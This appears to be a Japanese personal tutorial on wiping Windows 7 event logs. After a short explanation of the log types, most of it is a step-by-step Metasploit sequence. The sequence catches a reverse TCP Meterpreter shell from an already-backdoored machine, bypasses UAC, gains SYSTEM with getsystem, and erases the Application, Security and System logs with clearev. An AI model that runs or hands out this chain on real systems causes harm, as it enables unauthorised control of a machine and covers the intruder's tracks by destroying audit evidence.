Windows7 ログ削除
Windows システムログは
イベントログとして記録され
これは
イベントビューアで確認できる
WIndows で確認するには
スタートメニューで
eventvwr.msc
とすれば
Event Viewwer が起動しログの確認ができる
主なイベントログは
Application
アプリやプログラムが記録する情報
エラーなどが該当
Security
Windows 椅子sテムが記録する情報
特定ファイルの読み取り失敗とか
ログオンの成否などなど
System
標準サービスの記録情報
デバイスドライバ
OSブートなどなど
これらを削除するには
KaliLinux 側で SYSTEM権限で
clearev コマンドを使うことで削除が可能になる
すでにバックドア設置済みな場合
1 | msfconsole |
で
Metaploit を起動
msf コンソールが起動したら
1 | use exploit/multi/handler |
でハンドラーモジュールを使用
1 | set payload windows/meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
これで
1 | exploit |
でペイロードが実行され、待受状態になってから
50秒後にセッションが接続される
ただし、この状態ではSYSTEM権限ではないし
そのままでは権限昇格もできない
次に
1 | background |
というように
background コマンドを使い
Meterpreter セッションをバックグラウンドにして
msf プロンプトにする
次にUAC機能をバイパスするモジュールを使う
これは確率済みセッションを通して Exploit を送る
1 | use exploit/windows/local/bypassuac |
で使用するペイロードをセット
次に
1 | set SESSION 1 |
でセッションをセット
そして再度 reverse_tcp を設定
1 | set payload windows/meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
これで
1 | exploit |
でUAC機能をバイパスした状態で実行できる
次に権限昇格
1 | getsystem -t 1 |
これでユーザ権限を確認するとSYSTEM権限になっているのがわかる
1 | getuid |
これで権限を得たので
1 | clearev |
を実行するとイベントログが消去される
